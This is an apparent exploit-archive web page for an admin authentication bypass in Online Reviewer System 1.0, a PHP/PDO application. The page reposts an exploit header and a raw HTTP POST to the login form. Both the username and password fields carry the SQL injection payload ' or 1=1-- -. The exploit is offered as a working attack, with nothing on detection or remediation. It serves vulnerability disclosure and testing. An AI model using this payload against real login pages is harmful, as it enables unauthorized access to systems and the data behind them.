Home Tools Exploits & CVE's Online Reviewer System 1.0 SQL Injection

Online Reviewer System 1.0 SQL Injection

February 1, 2021

822

Online Reviewer System version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

Change Mirror Download

# Exploit Title: Online Reviewer System (PHPPDO) - Admin Authentication Bypass
# Exploit Author: Richard Jones
# Date: 2021-01-31
# Vendor Homepage: https://www.sourcecodester.com/php/12937/online-reviewer-system-using-phppdo.html
# Software Link: https://www.sourcecodester.com/download-code?nid=12937&title=Online+Reviewer+System+Using+PHP%2FPDO+with+Source+Code
# Version: 1.0
# Tested On: Windows 10 Home 19041 (x64_86) + XAMPP 7.2.34

#Exploit URL: http://TARGET//reviewer/login/
POST /reviewer/login/ HTTP/1.1
Host: 127.0.0.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 70
Cookie: PHPSESSID=e7vm5jbstk9ii5ghh7sm7n1mbc
Upgrade-Insecure-Requests: 1

username=a%27+or+1%3D1--+-&password=a%27+or+1%3D1--+-&btn-login=Log+In

Online Reviewer System 1.0 SQL Injection

Follow us on Instagram @thecyberpost

EDITOR PICKS

LRMS PHP 1.0 SQL Injection / Shell Upload

Palo Alto PAN-OS Command Execution / Arbitrary File Creation

Palo Alto Networks PAN-OS Unauthenticated Remote Code Execution

POPULAR POSTS

Restaurant Reservation System Patches Easy-to-Exploit XSS Bug

Sniffle – A Sniffer For Bluetooth 5 And 4.X LE

Domhttpx – A Google Search Engine Dorker With HTTP Toolkit Built...

POPULAR CATEGORY

AMS Logistics 2.2 SQL Injection

ZeroShell 3.9.0 Remote Command Execution

Qualcomm Adreno/KGSL Data Leakage